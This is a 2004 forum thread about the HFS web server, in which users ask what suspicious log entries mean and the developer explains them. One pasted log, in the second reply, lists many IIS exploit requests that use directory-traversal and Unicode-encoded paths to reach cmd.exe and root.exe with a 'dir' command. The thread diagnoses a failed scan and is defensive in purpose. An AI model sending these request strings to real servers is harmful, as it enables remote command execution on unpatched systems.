Check this out...

Chez · **on:** February 18, 2004, 04:14:02 PM

Look what I found in my HFS log:

07:58:31 64.166.117.133:2702 Requested GEThttp://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi
07:58:31 64.166.117.133:2702 Fully downloaded

What the hell is this ?

rejetto · **Reply #1 on:** February 18, 2004, 09:28:17 PM

someone requested that URL to your HFS.
i guess HFS replied a 404 error, but older builds (current is rc13) had a bug showing "fully downloaded" in the log for errors too

SAT · **Reply #2 on:** February 19, 2004, 03:11:36 AM

Hello Rejetto can you tell me what this user was doing? & how can I tell what information he recieved?

2/18/2004 1:46:15 PM 24.59.78.218:3196 Connected
2/18/2004 1:46:15 PM 24.59.78.218:3196 Requested GET/scripts/root.exe?/c dir
2/18/2004 1:46:15 PM 24.59.78.218:3196 Fully downloaded
2/18/2004 1:46:16 PM 24.59.78.218:3298 Connected
2/18/2004 1:46:16 PM 24.59.78.218:3298 Requested GET/MSADC/root.exe?/c dir
2/18/2004 1:46:16 PM 24.59.78.218:3298 Fully downloaded
2/18/2004 1:46:17 PM 24.59.78.218:3347 Connected
2/18/2004 1:46:17 PM 24.59.78.218:3347 Requested GET/c/winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:17 PM 24.59.78.218:3347 Fully downloaded
2/18/2004 1:46:18 PM 24.59.78.218:3371 Connected
2/18/2004 1:46:18 PM 24.59.78.218:3371 Requested GET/d/winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:18 PM 24.59.78.218:3371 Fully downloaded
2/18/2004 1:46:19 PM 24.59.78.218:3393 Connected
2/18/2004 1:46:19 PM 24.59.78.218:3393 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:19 PM 24.59.78.218:3393 Fully downloaded
2/18/2004 1:46:19 PM 24.59.78.218:3416 Connected
2/18/2004 1:46:20 PM 24.59.78.218:3416 Requested GET/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:20 PM 24.59.78.218:3416 Fully downloaded
2/18/2004 1:46:20 PM 24.59.78.218:3430 Connected
2/18/2004 1:46:20 PM 24.59.78.218:3430 Requested GET/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:20 PM 24.59.78.218:3430 Fully downloaded
2/18/2004 1:46:21 PM 24.59.78.218:3450 Connected
2/18/2004 1:46:21 PM 24.59.78.218:3450 Requested GET/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:21 PM 24.59.78.218:3450 Fully downloaded
2/18/2004 1:46:22 PM 24.59.78.218:3509 Connected
2/18/2004 1:46:22 PM 24.59.78.218:3509 Requested GET/scripts/..Á../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:22 PM 24.59.78.218:3509 Fully downloaded
2/18/2004 1:46:23 PM 24.59.78.218:3530 Connected
2/18/2004 1:46:23 PM 24.59.78.218:3530 Requested GET/scripts/..À/../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:23 PM 24.59.78.218:3530 Fully downloaded
2/18/2004 1:46:24 PM 24.59.78.218:3549 Connected
2/18/2004 1:46:24 PM 24.59.78.218:3549 Requested GET/scripts/..À¯../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:24 PM 24.59.78.218:3549 Fully downloaded
2/18/2004 1:46:25 PM 24.59.78.218:3574 Connected
2/18/2004 1:46:25 PM 24.59.78.218:3574 Requested GET/scripts/..Áœ../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:25 PM 24.59.78.218:3574 Fully downloaded
2/18/2004 1:46:29 PM 24.59.78.218:3590 Connected
2/18/2004 1:46:35 PM 24.59.78.218:3590 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:35 PM 24.59.78.218:3590 Fully downloaded
2/18/2004 1:46:36 PM 24.59.78.218:3872 Connected
2/18/2004 1:46:36 PM 24.59.78.218:3872 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:36 PM 24.59.78.218:3872 Fully downloaded

rejetto · **Reply #3 on:** February 19, 2004, 03:41:42 AM

he's trying to exploit of IIS
but no IIS here :roll:
he got nothing

as i already said, the "fully downloaded" is a bug in the log of your version
update to get rid of it

SAT · **Reply #4 on:** February 19, 2004, 04:35:35 PM

Quote from: "rejetto"

he's trying to exploit of IIS
but no IIS here :roll:
he got nothing

as i already said, the "fully downloaded" is a bug in the log of your version
update to get rid of it

Thanks for your reply sir. That is my ISP trying to see what I am sharing.
he's also looking for c: I am using F: :-)

I am running v1.6 rc11...I am having some trouble understanding how to automate creating log files daily , but otherwise am very gratefull for your work. This is a kick-ass http server.
I didnt see any links for donations? I want to donate.

Anonymous · **Reply #5 on:** February 19, 2004, 07:15:59 PM

Quote from: "SAT"

I didnt see any links for donations? I want to donate.

Look here - right botton... :
http://www.rejetto.com/

rejetto · **Reply #6 on:** February 19, 2004, 08:17:33 PM

daily log?
the log file is not locked most of time, so you can use an external "rotation" software (i think apache has one)

SAT · **Reply #7 on:** February 20, 2004, 02:57:10 PM

Quote from: "Anonymous"

Quote from: "SAT"
I didnt see any links for donations? I want to donate.

Look here - right botton... :
http://www.rejetto.com/

I will "little bit each time...so I dont miss it"

rejetto · **Reply #8 on:** February 20, 2004, 07:54:55 PM

thank you for the donation

really appreciated
i shall put the paypal button somewhere else